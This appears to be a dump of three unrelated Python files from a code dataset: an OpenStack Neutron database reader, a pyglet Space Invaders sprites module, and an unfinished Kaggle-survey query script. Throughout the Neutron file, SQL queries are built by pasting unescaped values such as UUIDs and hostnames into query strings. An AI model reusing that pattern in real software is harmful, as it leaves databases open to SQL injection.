def get_routers(self, uuid=None):\n \"\"\"\n Return a dict containing the routers stored in Neutron.\n If an UUID is given, it will return only the router with the given UUID\n :param uuid: Optional UUID of the desired router\n :return dict: contains routers information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from routers left join ' \\\n 'routerl3agentbindings on routers.id = routerl3agentbindings.router_id'\n\n if uuid:\n query += ' where routers.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'router'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['status'] = row[3]\n res[row[1]]['attributes']['admin_state_up'] = row[4]\n res[row[1]]['attributes']['gw_port_id'] = row[5]\n res[row[1]]['attributes']['enable_snat'] = row[6]\n res[row[1]]['attributes']['l3_agent_id'] = row[8]\n res[row[1]]['attributes']['ports'] = []\n port_query = 'select * from routerports where router_id=\"' + row[1] + '\"'\n cur.execute(port_query)\n for port_row in cur.fetchall():\n res[row[1]]['attributes']['ports'].append(port_row[1])\n\n return res\n\n def get_floating_ips(self, uuid=None):\n \"\"\"\n Return a dict containing the FloatingIPs stored in Neutron.\n If an UUID is given, it will return only the FloatingIP with the given UUID\n :param uuid: Optional UUID of the desired FloatingIP\n :return dict: contains FloatingIPs information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n query = 'select * from floatingips'\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n res[row[1]]['type'] = 'floatingip'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['floating_ip_address'] = row[2]\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['port_id'] = row[4]\n res[row[1]]['attributes']['fixed_port_id'] = row[5]\n res[row[1]]['attributes']['router_id'] = row[7]\n sub_query = 'select mac_address from ports where id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['mac_address'] = sub_row[0]\n sub_query = 'select subnet_id from ipallocations where port_id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['subnet_id'] = sub_row[0]\n return res\n\n def get_ports_by_instance_uuid(self, instance_uuid):\n \"\"\"\n Return list of Neutron ports of the given Nova instance.\n :param instance_uuid: UUID of the Nova Instance\n :return list: contains ports UUID\n \"\"\"\n res = []\n cur = self.conn.cursor()\n query = 'SELECT id FROM ports WHERE device_id = \"' + instance_uuid + '\"'\n cur.execute(query)\n for row in cur.fetchall():\n res.append(row[0])\n return res\n\n def get_ports(self, uuid=None):\n \"\"\"\n Return a dict containing the ports stored in Neutron.\n If an UUID is given, it will return only the port with the given UUID\n :param uuid: Optional UUID of the desired port\n :return dict: contains ports information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from ports where device_owner != \"network:floatingip\"'\n if uuid:\n query += ' and id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n if row[2] != '':\n res[row[1]]['name'] = row[2]\n\n res[row[1]]['type'] = 'port'\n res[row[1]]['resource_type'] =
'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['mac_address'] = row[4]\n res[row[1]]['attributes']['admin_state_up'] = row[5]\n res[row[1]]['attributes']['status'] = row[6]\n res[row[1]]['attributes']['device_id'] = row[7]\n\n if row[8] != '':\n res[row[1]]['attributes']['device_owner'] = row[8]\n\n query = 'select * from ml2_port_bindings'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n if row[1] != '':\n res[row[0]]['hostname'] = row[1]\n res[row[0]]['attributes']['vif_type'] = row[2]\n res[row[0]]['attributes']['driver'] = row[3]\n res[row[0]]['attributes']['segment'] = row[4]\n res[row[0]]['attributes']['vnic_type'] = row[5]\n\n if row[6] != '':\n res[row[0]]['attributes']['vif_details'] = json.loads(row[6])\n if row[7] != '':\n res[row[0]]['attributes']['profile'] = row[7]\n\n query = 'select * from ipallocations'\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n res[row[0]]['attributes']['ip_address'] = row[1]\n res[row[0]]['attributes']['subnet_id'] = row[2]\n\n for port in res.keys():\n if res[port]['attributes']['vif_type'] != 'unbound':\n host = res[port]['hostname']\n if res[port]['attributes']['driver'] in MAP_DRIVER_BINARY.keys():\n driver = res[port]['attributes']['driver']\n query = 'select id from agents where agents.host=\"' + host + \\\n '\" and agents.binary=\"' + MAP_DRIVER_BINARY[driver] + '\" LIMIT 1;'\n cur.execute(query)\n for row in cur.fetchall():\n res[port]['attributes']['agent_id'] = row[0]\n\n query = 'select * from floatingips'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[5] in res.keys():\n if 'floatingips' not in res[row[5]]['attributes'].keys():\n res[row[5]]['attributes']['floatingips'] = []\n res[row[5]]['attributes']['floatingips'].append(row[1])\n\n return res\n\n def get_agents(self, uuid=None):\n \"\"\"\n Return a dict containing the Neutron agents stored in Neutron.\n If an UUID is given, it will return only the agent with the given UUID\n :param uuid: Optional UUID of the desired agent\n :return dict: contains agents information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from agents'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'service'\n res[row[0]]['name'] = row[1]\n res[row[0]]['hostname'] = row[4]\n res[row[0]]['category'] = 'network'\n res[row[0]]['type'] = row[2]\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['admin_state_up'] = row[5]\n res[row[0]]['attributes']['configurations'] = json.loads(row[10])\n return res\n\n def get_networks(self, uuid=None):\n \"\"\"\n Return a dict containing the networks stored in Neutron.\n If an UUID is given, it will return only the network with the given UUID\n :param uuid: Optional UUID of the desired network\n :return dict: contains networks information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select n.id, n.name, n.status, n.admin_state_up, n.shared from networks n'\n\n if uuid:\n query += ' where n.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'virtual'\n res[row[0]]['name'] = row[1]\n res[row[0]]['type'] = 'net'\n res[row[0]]['category'] = 'network'\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['status'] = row[2]\n 
res[row[0]]['attributes']['admin_state_up'] = row[3]\n res[row[0]]['attributes']['shared'] = row[4]\n subnets = self.get_subnets_by_net_id(row[0])\n if subnets and len(subnets) > 0:\n res[row[0]]['attributes']['subnets'] = subnets\n\n query = 'select m.network_id, m.network_type, m.physical_network, ' \\\n 'm.segmentation_id, m.is_dynamic from ml2_network_segments m'\n\n if uuid:\n query += ' where m.network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['network_type'] = row[1]\n res[row[0]]['attributes']['physical_network'] = row[2]\n res[row[0]]['attributes']['segmentation_id'] = row[3]\n res[row[0]]['attributes']['is_dynamic'] = row[4]\n\n query = 'select network_id, dhcp_agent_id from networkdhcpagentbindings'\n\n if uuid:\n query += ' where network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['dhcp_agent_id'] = row[1]\n\n return res\n\n def get_subnets_by_net_id(self, net_id):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron for a given Network.\n\n :param net_id: UUID of the desired Network\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets where network_id = \"' + net_id + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['name'] = row[2]\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n\n def get_subnets(self, uuid=None):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron.\n If an UUID is given, it will return only the subnet with the given UUID\n :param uuid: Optional UUID of the desired subnet\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'subnet'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers 
where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n","repo_name":"IntelLabsEurope/infrastructure-repository","sub_path":"monitoring_service/epa_database/openstack/neutron_db.py","file_name":"neutron_db.py","file_ext":"py","file_size_in_byte":15327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70831511773","text":"import random\n\nimport pyglet\nfrom pyglet.window import key\n\nclass _Shield(object):\n def __init__(self, x, y):\n self.x, self.y = x, y\n self.sprites = [\n None,\n pyglet.resource.image('shield_damlo.png'),\n pyglet.resource.image('shield_damhi.png'),\n pyglet.resource.image('shield_full.png'),\n pyglet.resource.image('shield_nw.png'),\n pyglet.resource.image('shield_ne.png'),\n ]\n self.states = [\n [0, 4, 3, 3, 3, 3, 5, 0],\n [4, 3, 3, 3, 3, 3, 3, 5],\n [3, 3, 0, 0, 0, 0, 3, 3],\n [3, 3, 0, 0, 0, 0, 3, 3],\n ]\n self.IW = self.sprites[3].width\n self.IH = self.sprites[3].height\n self.RC = range(len(self.states))\n self.CC = range(len(self.states[0]))\n self.width = len(self.states[0]) * self.IW\n def update(self):\n pass\n def paint(self):\n for s_r in self.RC:\n for s_c in self.CC:\n s = self.sprites[self.states[s_r][s_c]]\n x = self.x + s_c * self.IW\n y = self.y - s_r * self.IH\n if s: s.blit(x, y)\n def _reducedState(self, s, fromAbove):\n if s in [1, 2]:\n return 0\n elif s in [3, 4, 5]:\n return {True:1,False:2}[fromAbove]\n else:\n assert False\n def top(self):\n return self.y + self.IH\n def absorb(self, xl, yl, xh, yh, fromAbove):\n x = (xl + xh) / 2\n for r in self.RC:\n ry = self.y - r * self.IH\n if yl >= ry + self.IH: continue\n if yh < ry: continue\n for c in self.CC:\n cx = self.x + c * self.IW\n if not self.states[r][c]: continue\n if x < cx: continue\n if x >= cx + self.IW: continue\n s = self.states[r][c]\n self.states[r][c] = self._reducedState(s, fromAbove)\n return True\n def height(self):\n return self.IH * len(self.RC)\n def bitHeight(self):\n return self.IH\n def melt(self, invaderInvasionY):\n anythingMelted = False\n row = invaderInvasionY // self.IH\n if row < 0:\n return anythingMelted\n if row > len(self.states):\n row = len(self.states)\n for i_r in xrange(row):\n for i_c in self.CC:\n s = self.states[i_r][i_c]\n if s:\n anythingMelted = True\n self.states[i_r][i_c] = self._reducedState(s, True)\n return anythingMelted\n \nclass Shields(object):\n def __init__(self, window):\n sw = _Shield(0, 0).width\n pad = 128\n num = 4\n y = 96\n i_pad = (window.width - 2 * pad - sw) / (num-1)\n self.subs = [_Shield(pad + i_pad*i_x, y)\n for i_x in range(4)]\n self.top = self.subs[0].top()\n self.nextMelt = self.top\n def melt(self, invaderheight):\n anythingMelted = False\n if invaderheight < self.nextMelt:\n for s in self.subs:\n if s.melt(self.top - invaderheight):\n anythingMelted = True\n if not anythingMelted:\n self.nextMelt -= self.subs[0].bitHeight()\n return anythingMelted\n def absorbFromAbove(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, True)\n def absorbFromBelow(self, 
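# same bounding-box check as absorbFromAbove, but flags the hit as coming from below\n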
xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, False)\n def _absorb(self, xl, yl, xh, yh, fromAbove):\n for s in self.subs:\n if s.absorb(xl, yl, xh, yh, fromAbove):\n return self\n return None\n def update(self):\n pass\n def paint(self):\n for s in self.subs:\n s.paint()\n\nclass Lives(object):\n PAD_OUTER = 3\n PAD_INNER = 1\n def __init__(self, window):\n self.liferepr = pyglet.resource.image('playerlife.png')\n self.count = 2\n self.x = window.width - (self.PAD_OUTER + self.liferepr.width)\n self.y = window.height - (self.PAD_OUTER + self.liferepr.height)\n def paint(self):\n for i in range(self.count):\n x = self.x - i * (self.PAD_INNER + self.liferepr.width)\n self.liferepr.blit(x, self.y)\n def update(self):\n pass\n def upOne(self):\n self.count += 1\n def loseOne(self):\n self.count -= 1\n\nclass Player(object):\n def __init__(self, window, keys):\n self.w = window\n self.k = keys\n self.gun = _Gun(window)\n self.s_alive = _AlivePlayer(window, keys, self.gun)\n self.s_dead = _DeadPlayer()\n self.state = self.s_alive\n def isHit(self, xl, yl, xh, yh):\n if self.state != self.s_alive: return None\n if self.s_alive.isHit(xl, yl, xh, yh):\n self.s_dead.init(self.s_alive.x, self.s_alive.y)\n self.state = self.s_dead\n return self\n return None\n def testGunHit(self, hitFuns):\n self.gun.testHit(hitFuns)\n def update(self):\n self.gun.update()\n if self.state == self.s_dead:\n if not self.state.stillDead:\n self.state = self.s_alive\n self.state.resurrect()\n self.state.update()\n def paint(self):\n self.gun.paint()\n self.state.paint()\n\nclass LostPlayer(object):\n def __init__(self, origPlayer):\n if origPlayer.state == origPlayer.s_alive:\n self.state = origPlayer.s_dead\n self.state.init(origPlayer.s_alive.x,\n origPlayer.s_alive.y)\n else:\n self.state = origPlayer.s_dead\n def isHit(self, xl, yl, xh, yh):\n return None\n def testGunHit(self, hitFuns):\n pass\n def update(self):\n self.state.update()\n def paint(self):\n self.state.paint()\n\nclass _DeadPlayer(object):\n ANIMSPEED = 3\n def __init__(self):\n self.anim = [\n pyglet.resource.image('playermelt01.png'),\n pyglet.resource.image('playermelt02.png'),\n pyglet.resource.image('playermelt03.png'),\n pyglet.resource.image('playermelt04.png'),\n ]\n self.a_tick = 0\n self.a_state = None\n self.stillDead = None\n self.x, self.y = 0, 0\n def init(self, x, y):\n self.x = x\n self.y = y\n self.a_state = 0\n self.stillDead = 30\n self.a_tick = self.ANIMSPEED\n def update(self):\n if self.stillDead: self.stillDead -= 1\n if self.a_state == None: return\n self.a_tick -= 1\n if self.a_tick: return\n self.a_tick = self.ANIMSPEED\n self.a_state += 1\n if self.a_state >= len(self.anim):\n self.a_state = None\n return\n def paint(self):\n if self.a_state == None: return\n self.anim[self.a_state].blit(self.x, self.y)\n \nclass _AlivePlayer(object):\n def __init__(self, window, keys, gun):\n self.w = window\n self.gun = gun\n self.s = pyglet.resource.image('player.png')\n self.x, self.y = self.w.width/2, 4\n self.keys = keys\n self.invulnerable = 0\n def resurrect(self):\n self.invulnerable = 50\n def update(self):\n if self.invulnerable:\n self.invulnerable -= 1\n vx = 0\n if self.keys[key.LEFT]: vx -= 10\n if self.keys[key.RIGHT]: vx += 10\n self.x += vx\n self.x = max(self.x, 0)\n self.x = min(self.x, self.w.width - self.s.width)\n if self.keys[key.SPACE]: self._pewpew()\n def isHit(self, xl, yl, xh, yh):\n if self.invulnerable: return False\n sxh = self.x+self.s.width\n syh = self.y+self.s.height\n if yl > syh: return False\n 
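# the remaining comparisons complete an axis-aligned bounding-box overlap test against the player sprite\n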
if yh < self.y: return False\n if xl > sxh: return False\n if xh < self.x: return False\n return True\n def paint(self):\n if self.invulnerable:\n if (self.invulnerable/5)%2:\n return\n self.s.blit(self.x, self.y)\n def _pewpew(self):\n self.gun.fire(self.x + (self.s.width/2), self.y + self.s.height)\n\nclass _Gun(object):\n COOLDOWN_MAX = 5\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('pewpew.png')\n self.cx, self.cy = self.s.width/2, 0\n self.x, self.y = 0, 0\n self.firing = False\n self.cooldown = 0\n def fire(self, x, y):\n if self.firing: return\n if self.cooldown: return\n self.x = x - self.cx\n self.y = y - self.cy\n self.firing = True\n self.cooldown = self.COOLDOWN_MAX\n def update(self):\n if self.cooldown: self.cooldown -= 1\n if not self.firing: return\n self.y += 15\n if self.y > self.w.height:\n self.firing = False\n return\n def testHit(self, hitFun):\n if not self.firing: return\n if hitFun(self.x, self.y, self.x+self.s.width, self.y+self.s.height):\n self.firing = False\n def paint(self):\n if not self.firing: return\n self.s.blit(self.x, self.y)\n\nclass _InvaderExplode(object):\n def __init__(self):\n s = [pyglet.resource.image('invaderexplode0.png'),\n pyglet.resource.image('invaderexplode1.png')]\n self.x, self.y = 0, 0\n self.sm = {'inactive': {'d': 0, 'next': None, 's': None},\n 'explode0': {'d': 5, 'next': 'explode1', 's': s[0]},\n 'explode1': {'d': 10, 'next': 'inactive', 's': s[1]}}\n self.st = 'inactive'\n self.st_c = 0\n def trans(self, state):\n self.st = state\n self.st_c = self.sm[state]['d']\n def boom(self, x, y):\n self.x, self.y = x, y\n self.trans('explode0')\n def paint(self):\n s = self.sm[self.st]['s']\n if not s: return\n s.blit(self.x, self.y)\n def update(self):\n if not self.st_c: return\n self.st_c -= 1\n if self.st_c: return\n self.trans(self.sm[self.st]['next'])\n\nclass _InvaderZap(object):\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('zapzap.png')\n self.cx, self.cy = self.s.width/2, 0\n self.xyl = []\n self.wh = (self.s.width, self.s.height)\n def fire(self, x, y):\n self.xyl.append([x - self.cx, y - self.cy])\n def update(self):\n for p in self.xyl: p[1] -= 10\n self.xyl = [p for p in self.xyl if p[1] > -self.s.height]\n def testHit(self, hitFuns):\n hitItems = []\n xyl2 = []\n for p in self.xyl:\n bounds = p[0], p[1], p[0]+self.s.width, p[1]+self.s.height\n hit = reduce(lambda a, f: a or f(*bounds), hitFuns, None)\n if hit:\n hitItems.append(hit)\n continue # shot absorbed\n xyl2.append(p)\n self.xyl = xyl2\n return hitItems\n def paint(self):\n for [x, y] in self.xyl:\n self.s.blit(x, y)\n\nclass Invaders(object):\n def __init__(self, window, diffLevel):\n self.w = window\n self.diffLevel = diffLevel\n self.ROWS = 6\n self.COLS = 8\n self.explode = _InvaderExplode()\n self.zap = _InvaderZap(window)\n self.invader0 = [\n pyglet.resource.image('invader01.png'),\n pyglet.resource.image('invader02.png')]\n self.iw, self.ih = self.invader0[0].width, self.invader0[0].height\n self.pad = 16\n self.x = 2 * self.pad\n self.y = self.w.height - (self.ih + 2 * self.pad)\n self.il = [[True]*self.COLS for _ in [None]*self.ROWS]\n self.bipbop = 0\n self.bipcnt = 0\n self.zapcnt = 100\n self.vx = self.iw/4\n self.vy = -(self.ih + self.pad)\n self.calcWidth()\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.moving = True\n\n def reachedBottom(self):\n return self.bottomBoundary <= 0\n\n def calcBottomBoundary(self):\n bott = -1\n for i_r in 
xrange(len(self.il)):\n if max(self.il[i_r]):\n bott = i_r\n _, y = self.pos(bott, 0)\n return y\n \n def calcSpeed(self):\n def getDiffCurve():\n if self.diffLevel > 12:\n return [1, 2, 3, 4, 5, 6, 7]\n if self.diffLevel > 8:\n return [1, 2, 4, 5, 6, 8, 10]\n if self.diffLevel > 6:\n return [2, 4, 5, 6, 8, 10, 13]\n if self.diffLevel > 4:\n return [3, 5, 6, 8, 10, 13, 16]\n if self.diffLevel > 1:\n return [4, 6, 8, 10, 13, 16, 18]\n else:\n return [5, 7, 10, 13, 16, 18, 20]\n speeds = getDiffCurve()\n n = 0\n for r in xrange(self.ROWS):\n for c in xrange(self.COLS):\n if self.il[r][c]:\n n += 1\n if n < 2:\n return speeds[0]\n if n < 5:\n return speeds[1]\n if n < 10:\n return speeds[2]\n if n < 20:\n return speeds[3]\n if n < 30:\n return speeds[4]\n if n < 40:\n return speeds[5]\n else:\n return speeds[6]\n\n def collide(self, xl, yl, xh, yh):\n for i_r in xrange(self.ROWS):\n i_yl = self.y - (self.ih + self.pad) * i_r\n i_yh = i_yl + self.ih\n if yh < i_yl: continue\n if yl > i_yh: continue\n for i_c in xrange(self.COLS):\n i_xl = self. x + (self.iw + self.pad) * i_c\n i_xh = i_xl + self.iw\n if xh < i_xl: continue\n if xl > i_xh: continue\n if self.il[i_r][i_c]:\n self.il[i_r][i_c] = False\n self.explode.boom(i_xl, i_yl)\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.reduceSizeIfNeeded()\n return True\n return False\n\n def allDead(self):\n return not self.COLS\n\n def removeZaps(self):\n self.zap = _InvaderZap(self.w)\n\n def reduceSizeIfNeeded(self):\n for i_c in [0, -1]:\n if not self.COLS: return\n if not sum([self.il[i_r][i_c]\n for i_r in range(self.ROWS)]):\n self.stripCol(i_c)\n self.reduceSizeIfNeeded()\n\n def stripCol(self, i_c):\n self.COLS -= 1\n for r in self.il:\n r.pop(i_c)\n if i_c == 0:\n self.x += self.iw + self.pad\n self.calcWidth()\n\n def calcWidth(self):\n self.totWidth = len(self.il[0]) * (self.iw + self.pad) - self.pad\n\n def getBottomOfRandomRow(self):\n candidates = []\n for i_c in xrange(self.COLS):\n for i_r in xrange(self.ROWS-1, -1, -1):\n if self.il[i_r][i_c]:\n candidates.append((i_r, i_c))\n break\n if not candidates:\n return None, None\n r, c = random.choice(candidates)\n x, y = self.pos(r, c)\n x += self.invader0[0].width / 2\n return x, y\n\n def update(self):\n self.explode.update()\n self.zap.update()\n self.bipcnt = (self.bipcnt + 1)%self.speed\n if self.bipcnt == 0:\n self.bipbop = (self.bipbop + 1)%2\n if self.moving:\n self.x += self.vx\n if (self.x + self.totWidth > self.w.width) or (self.x < 0):\n self.vx *= -1\n self.x += self.vx\n self.y += self.vy\n self.bottomBoundary = self.calcBottomBoundary()\n self.zapcnt -= 1\n if self.zapcnt == 0:\n self.zapcnt = random.randrange(10, 120)\n x, y = self.getBottomOfRandomRow()\n if x != None:\n self.zap.fire(x, y)\n\n def pos(self, r, c):\n return (self.x + c*(self.iw + self.pad),\n self.y - r*(self.ih + self.pad))\n\n def paint(self):\n def paintOne(row, col):\n x, y = self.pos(row, col)\n s = self.invader0[self.bipbop]\n s.blit(x, y)\n self.explode.paint()\n self.zap.paint()\n for ir in xrange(len(self.il)):\n row = self.il[ir]\n for ic in xrange(len(row)):\n row[ic] and paintOne(ir, ic)\n\nGAMEOVER_LABEL = pyglet.text.Label(\n 'GAME OVER',\n font_name=\"sans\",\n font_size=24,\n x=0, # set later\n y=0, # set later\n anchor_x=\"center\",\n anchor_y=\"center\") \nclass GameOver(object):\n def __init__(self, window):\n self.lbl = GAMEOVER_LABEL\n self.lbl.x = window.width//2\n self.lbl.y = window.height//2\n def update(self):\n pass\n def paint(self):\n 
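# GameOver only needs to draw the shared, pre-positioned label each frame\n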
self.lbl.draw()\n\nclass Level(object):\n def __init__(self, window):\n self.window = window\n self.value = 1\n self.lbl = self.mkLbl()\n self.fullYayWait = 60\n self.done = False\n def mkLbl(self):\n color = (255, 255, 255, 255)\n shinies = '%s'\n if self.value >= 2:\n shinies = shinies%'-%s-'\n if self.value >= 4:\n shinies = shinies%'=%s='\n if self.value >= 6:\n shinies = shinies%'<%s>'\n if self.value >= 8:\n shinies = shinies%'*%s*'\n if self.value >= 10:\n shinies = shinies%'>%s<'\n if self.value >= 12:\n shinies = shinies%'{%s}'\n if self.value >= 14:\n shinies = shinies%'~%s~'\n if self.value >= 16:\n shinies = shinies%'_%s_'\n if self.value >= 18:\n shinies = shinies%'/%s\\\\'\n if self.value >= 20:\n shinies = shinies%' %s '\n color = (238, 201, 0, 255) # gold!\n return pyglet.text.Label(\n shinies%('LEVEL %d'%self.value),\n font_name=\"sans\",\n font_size=15,\n x=self.window.width // 2,\n y=self.window.height,\n anchor_x=\"center\",\n anchor_y=\"top\",\n color=color)\n def up(self):\n self.value += 1\n self.lbl = self.mkLbl()\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\ndef _mkYayLbl(level):\n return pyglet.text.Label(\n 'YOU BEAT LEVEL %d'%level,\n font_name=\"sans\",\n font_size=50,\n x=0, # window.width // 2 later\n y=0, # window.height // 2 later\n anchor_x=\"center\",\n anchor_y=\"center\")\n_YAY_LABELS = [_mkYayLbl(n) for n in xrange(20)]\nclass YayYou(object):\n def __init__(self, window, level):\n global _YAY_LABELS\n while level >= len(_YAY_LABELS):\n _YAY_LABELS.extend([_mkYayLbl(n) for n in xrange(len(_YAY_LABELS), len(_YAY_LABELS)+10)])\n self.lbl = _YAY_LABELS[level]\n self.lbl.x = window.width // 2\n self.lbl.y = window.height // 2\n self.countdown = 60\n self.halfcountdown = self.countdown // 2\n self.done = False\n self.halfDone = False\n def update(self):\n if self.countdown:\n self.countdown -= 1\n self.halfDone = self.countdown > self.halfcountdown\n self.done = not self.countdown\n def paint(self):\n self.lbl.draw()\n","repo_name":"deestan/invade","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40295778448","text":"import psycopg2\n# from theapp import app\n# import viz\n# from flask import render_template, request\n#import pandas as pd #We don't have pandas yet.\n#We need to get some input things\n\n\n#y_n = request.args.get('all_or_none', default = None, type = str)\n#qst = request.args.get('question' , default = None, type = str)\n# subset by dropdown\ny_n = 'yes'\nqst = \"Who/what are your favorite media sources that report on data science topics?\"\n\nquestion_to_column = {\"Which of the following relational database products do you use on a regular basis?\": 'q34',\n 'Which of the following cloud computing platforms do you use on a regular basis?' : 'q29',\n \"Which of the following natural language processing (NLP) methods do you use on a regular basis?\": 'q27',\n 'Which categories of computer vision methods do you use on a regular basis?': 'q26',\n 'Which categories of ML tools do you use on a regular basis?' 
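# the q-numbers are the survey's column prefixes, e.g. q25 expands to columns q25_1..q25_8 below\n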
: 'q25' ,\n 'Which of the following ML algorithms do you use on a regular basis?': 'q24',\n 'What programming languages do you use on a regular basis?': 'q18',\n \"Which of the following integrated development environments (IDE's) do you use on a regular basis?\": 'q16',\n \"What is the primary tool that you use at work or school to analyze data?\": 'q14',\n \"On which platforms have you begun or completed data science courses?\" : 'q13',\n \"Who/what are your favorite media sources that report on data science topics?\": 'q12',\n \"Select any activities that make up an important part of your role at work\": 'q9'}\n\nother_questions = ['q9', 'q12', 'q14', 'q15', 'q16', 'q18', 'q24', 'q25', 'q26', 'q27', \"q29\", 'q34']\n\n# q14 is all free response so all or none are equivalent.\n\nquestion_size = {'q34': 12,\n 'q29': 12,\n 'q27': 6,\n 'q26': 7,\n 'q25': 8,\n 'q24': 12,\n 'q18': 12,\n 'q16': 12,\n 'q14': 5,\n 'q13': 12,\n 'q12': 12,\n 'q9': 8 }\n\n# Initialization code to be able to query the database\nconn = psycopg2.connect(\"dbname=kaggle user=abucklin\")\ncur = conn.cursor()\n\ndef query_generator_and_data_grabber(question = qst, yes_or_no = y_n):\n qnum = question_to_column[question] # use the parameter rather than the module-level qst\n columns = []\n for i in range(1, question_size[qnum]+1):\n string = qnum + \"_\" + str(i)\n columns.append(string)\n\n columns = \", \".join(columns) # join the column names into a comma-separated SELECT list\n\n basic = \"SELECT \" + columns + \" FROM mcq \"\n conditions = ''\n query = basic + conditions + \";\"\n cur.execute(query)\n data = cur.fetchall()\n\n if \"y\" in yes_or_no:\n second = \"SELECT \" + str(qnum) + \" FROM other_questions\"\n cur.execute(second + \";\")\n x = cur.fetchall()\n data.extend(x) # extend in place; list.extend() returns None\n return data\n\n\nraw_data = query_generator_and_data_grabber()\n\n#data = pd.DataFrame(raw_data, columns = [in_ss , in_pp]) #Still don't have 